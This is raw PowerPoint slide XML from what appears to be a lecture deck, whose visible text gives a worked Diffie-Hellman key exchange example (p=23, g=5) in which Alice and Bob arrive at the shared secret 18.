            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> mod 23 = 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Bob chooses a secret integer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 3, then sends Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> mod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> mod 23 = 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Alice computes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> mod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> mod 23 = 18</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Bob computes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> mod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="1" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> mod 23 = 18</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Alice and Bob now share a secret (the number 18).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Both Alice and Bob have arrived at the same value s, because, under mod p,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Abmodp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gabmodp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gbamodp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Bamodp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>[8]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{ABC2C3F8-920C-4239-9891-79F2271E8033}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38638852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2E80AE-A2D3-45AA-9282-165AD6710FE8}" type="slidenum">
              <a:rPr lang="en-US">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35923946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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133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33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F77F84-EBF5-4DC2-873D-49BD8B121CCF}" type="slidenum">
              <a:rPr lang="en-US">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3559678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2E80AE-A2D3-45AA-9282-165AD6710FE8}" type="slidenum">
              <a:rPr lang="en-US">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5479015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BC2C3F8-920C-4239-9891-79F2271E8033}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283742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BC2C3F8-920C-4239-9891-79F2271E8033}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24070064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BC2C3F8-920C-4239-9891-79F2271E8033}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31274969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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133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33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F77F84-EBF5-4DC2-873D-49BD8B121CCF}" type="slidenum">
              <a:rPr lang="en-US">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15374292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2E80AE-A2D3-45AA-9282-165AD6710FE8}" type="slidenum">
              <a:rPr lang="en-US">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33843364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1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/1/2019</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2249488" y="3402013"/>
            <a:ext cx="5372100" cy="2058987"/>
            <a:chOff x="914400" y="3657600"/>
            <a:chExt cx="7162800" cy="2059641"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="914400" y="3657600"/>
              <a:ext cx="7162800" cy="1295811"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="914400" y="5069335"/>
              <a:ext cx="7162800" cy="647906"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="914400" y="3657600"/>
              <a:ext cx="228600" cy="1295811"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="914400" y="5069335"/>
              <a:ext cx="228600" cy="647906"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2629775" y="3616586"/>
            <a:ext cx="4611655" cy="803564"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
